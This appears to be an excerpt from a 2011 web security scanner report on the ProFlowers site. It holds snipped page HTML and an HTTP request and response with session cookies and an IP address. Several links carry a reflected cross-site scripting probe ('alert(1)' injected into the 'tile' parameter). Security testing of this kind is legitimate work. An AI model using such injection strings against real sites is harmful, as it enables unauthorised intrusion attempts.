<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a id="_ctl18__ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div id="topMain" class="clearfix">
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
<a id="_ctl21_DHero_rptSlides__ctl0_herolink" border="0" href="/mothers-day-flowers-MDF?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_self"><img id="_ctl21_DHero_rptSlides__ctl0_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/Siteimages/HeroSpot_694x286_Mday_SoldOut.jpg" alt="Shop Belated Mother&#39;s Day Gifts" border="0" /></a>
...[SNIP]...
use=false;clearInterval(t);t = setTimeout(&#39;runSlideShow()&#39;, 1000);" href="http://products.proflowers.com/lilies/Lilies-for-Mom-482?trackingpgroup=HPC&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef"><img id="_ctl21_Ucproductrotater__productimage" border="0" onMouseOver="javascript:clearTimeout(t);" onMouseOut="javascript:pause=false;clearInterval(t);t = setTimeout(&#39;runSlideShow()&#39;, 1000);" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" border="0" style="height:198px;width:170px;" /></a>
...[SNIP]...
<div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/1_on.gif" id="_ctl21_Ucproductrotater_0" class="rotaterControlImageborder" OnClick="javascript:counter=0;changeImage();" onMouseOver="javascript:counter=0;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/2_off.gif" id="_ctl21_Ucproductrotater_1" class="rotaterControlImageborder" OnClick="javascript:counter=1;changeImage();" onMouseOver="javascript:counter=1;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/3_off.gif" id="_ctl21_Ucproductrotater_2" class="rotaterControlImageborder" OnClick="javascript:counter=2;changeImage();" onMouseOver="javascript:counter=2;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/4_off.gif" id="_ctl21_Ucproductrotater_3" class="rotaterControlImageborder" OnClick="javascript:counter=3;changeImage();" onMouseOver="javascript:counter=3;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/5_off.gif" id="_ctl21_Ucproductrotater_4" class="rotaterControlImageborder" OnClick="javascript:counter=4;changeImage();" onMouseOver="javascript:counter=4;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/6_off.gif" id="_ctl21_Ucproductrotater_5" class="rotaterControlImageborder" OnClick="javascript:counter=5;changeImage();" onMouseOver="javascript:counter=5;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/7_off.gif" id="_ctl21_Ucproductrotater_6" class="rotaterControlImageborder" OnClick="javascript:counter=6;changeImage();" onMouseOver="javascript:counter=6;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/8_off.gif" id="_ctl21_Ucproductrotater_7" class="rotaterControlImageborder" OnClick="javascript:counter=7;changeImage();" onMouseOver="javascript:counter=7;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/9_off.gif" id="_ctl21_Ucproductrotater_8" class="rotaterControlImageborder" OnClick="javascript:counter=8;changeImage();" onMouseOver="javascript:counter=8;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/10_off.gif" id="_ctl21_Ucproductrotater_9" class="rotaterControlImageborder" OnClick="javascript:counter=9;changeImage();" onMouseOver="javascript:counter=9;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div>
...[SNIP]...
etTimeout(&#39;runSlideShow()&#39;, 1000);" href="http://products.proflowers.com/lilies/Lilies-for-Mom-482?trackingpgroup=HPC&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef" style="height:19px;width:78px;"><img class="buyNow2" height="19px" width="78px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl21_LeftPodCB_podimagehyperlink" href="/house-plants-PBS?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_self"><img id="_ctl21_LeftPodCB_podimage" class="fullWidthHeight" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/Siteimages/LeftPod_227X159_10_PlantGif2.jpg" alt="Shop Plants" style="border-width:0px;" /></a>
...[SNIP]...
<a id="_ctl21_podOne_ProdImageHyperlink" href="http://products.proflowers.com/flowers/Moms-Delight-5566?trackingpgroup=pid&amp;tile=hmpg_podB&amp;Ref=HomeNoRef"><img id="_ctl21_podOne_ProdImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" border="0" style="height:140px;width:120px;" /></a>
...[SNIP]...
<a id="_ctl21_podOne_TitleImage" class="headerimage" href="http://products.proflowers.com/flowers/Moms-Delight-5566?trackingpgroup=pid&amp;tile=hmpg_podB&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages\PodTitle_SpecialOffer.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl21_podOne_buyButton" href="http://products.proflowers.com/flowers/Moms-Delight-5566?trackingpgroup=pid&amp;tile=hmpg_podB&amp;Ref=HomeNoRef" style="height:19px;width:78px;"><img class="buyNow2" height="19px" width="78px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl21_podTwo_ProdImageHyperlink" href="http://products.proflowers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?trackingpgroup=pid&amp;tile=hmpg_podC&amp;Ref=HomeNoRef"><img id="_ctl21_podTwo_ProdImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" border="0" style="height:140px;width:120px;" /></a>
...[SNIP]...
<a id="_ctl21_podTwo_TitleImage" class="headerimage" href="http://products.proflowers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?trackingpgroup=pid&amp;tile=hmpg_podC&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/SIteimages/PodTitle_SeasonalFavorite.gif" alt="" border="0" /></a>
...[SNIP]...
d="_ctl21_podTwo_buyButton" href="http://products.proflowers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?trackingpgroup=pid&amp;tile=hmpg_podC&amp;Ref=HomeNoRef" style="height:19px;width:78px;"><img class="buyNow2" height="19px" width="78px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl21_RightPodCB_podimagehyperlink" href="/birthday-flowers-BIR?tile=hmpg_podD&amp;Ref=HomeNoRef" target="_self"><img id="_ctl21_RightPodCB_podimage" class="fullWidthHeight" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/Siteimages/RightPod_261X159_Birthday11.jpg" alt="Shop Birthday Gifts" style="border-width:0px;" /></a>
...[SNIP]...
<div class="FlynnMagDefault FlynnMag">

   <img class="leftend" text="-" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/endLeft.gif" border="0" />
   <div class="magText">
...[SNIP]...
</div>
   <img class="rightend" text="-" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/endRight.gif" border="0" />
</div>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" border="0" /> </div>
...[SNIP]...
Input" type="text" value="Enter Your Email Here" id="_ctl22__ctl0_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
est flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a>
<a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a>
...[SNIP]...
onal flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
   <a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
   * This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
   * http://www.opinionlab.com
-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<!--ooend-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a>, find <a href="http://www.facebook.com/ProFlowers"> ProFlowers on Facebook</a> and <a href="http://twitter.com/PROFLOWERS"> Twitter</a> to see what...s new, read floral tips, and get <a href="http://www.proflowerscoupons.com">ProFlowers coupons</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
16.30. http://www.proflowers.com/house-plants-PBS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:43 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:10:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:43 GMT
Content-Length: 184823


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="canonical" href="http://www.proflowers.com/house-plants-pbs"/>
       <link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_category.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
   </head>
...[SNIP]...
<div id="innerContainer">

                       <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl14__homeLink" border="0" title="Go to ProFlowers Homepage" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" border="0" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="_ctl14__ctl91__repeater__ctl0__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_Category_#productgroup#_PRODUCTGROUP-PBS" target="_blank">Today</a>
...[SNIP]...
<a onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" border="0" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
